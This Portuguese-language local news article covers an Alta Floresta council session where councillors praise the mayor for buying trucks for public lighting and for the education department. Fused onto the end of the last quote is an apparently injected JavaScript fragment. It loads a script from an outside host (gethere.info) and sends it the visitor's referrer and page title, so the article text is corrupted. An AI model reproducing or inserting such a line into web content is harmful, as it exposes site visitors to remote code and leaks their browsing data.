Capa / Política / Vereadores enaltecem aquisição de veículos da Prefeitura

Vereadores enaltecem aquisição de veículos da Prefeitura

dscn8589Dionéia Martins

A sessão ordinária da Câmara Municipal desta terça-feira, 08, durou cerca de 30 minutos e apenas três vereadores fizeram uso da tribuna. Os vereadores Valdecir José dos Santos (Mendonça), Reinaldo de Souza (Lau) e Elisa Gomes.

A vereadora Elisa Gomes, agradeceu ao prefeito Asiel Bezerra pela aquisição do caminhão para o atendimento do setor de iluminação pública da Prefeitura. A iluminação nas ruas é uma cobrança do conselho e das autoridades de segurança, bem como de toda a população. “Queremos agradecer o sr. Prefeito pela aquisição daquele caminhão para trabalhar atender a iluminação pública, porque precisamos da cidade bem iluminada”, enalteceu a vereadora.

O caminhão modelo Caminhão 3/4- 4×2 da marca IVECO DAILY 55C17, equipado com os itens necessários para executar o trabalho no setor foi adquirido com recursos da arrecadação da taxa de iluminação pública. O município faz uma previsão anualmente de arrecadação, e este ano o valor já foi superado. “A previsão para 2016 era de R$ 1,5 milhão de taxa de iluminação pública, mas nós já arrecadamos até agosto quase R$ 2,3 milhões. Então nós agradecemos o investimento com a aquisição do caminhão que é extremamente importante para o município de Alta Floresta”, disse Elisa.

O líder do prefeito na Câmara, vereador Lau, ressaltou que não importa o valor arrecadado, mas sim que a administração aplique de forma responsável e transparente os recursos arrecadados. “Não importa o valor se foi 10, 20 ou 2 milhões que foi arrecadado, o importante é que está sendo investido e a comunidade tá vendo os frutos colhido, que muitas vezes fala que arrecadou, mais não aplica o dinheiro, e o exemplo está nas avenidas, nos nossos bairros, na nossa cidade”, pontuou.

Foi entregue também o caminhão 3/4 -4×2 da marca IVECO DAILY 70C17, para a Secretaria Municipal de Educação. O veículo será utilizado no transporte de óleo diesel para os ônibus da comunidade rural, no transporte de cadeiras, merenda escolar e outras necessidades das escolas municipais. “Quem ganha é a sociedade. Parabenizar o prefeito, a secretária Lenita que não mediu esforço para que isso acontecesse e todos os secretários”, disse Lau.s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Sobre admin

Deixe uma resposta

O seu endereço de email não será publicado. Required fields are marked *

*

Scroll To Top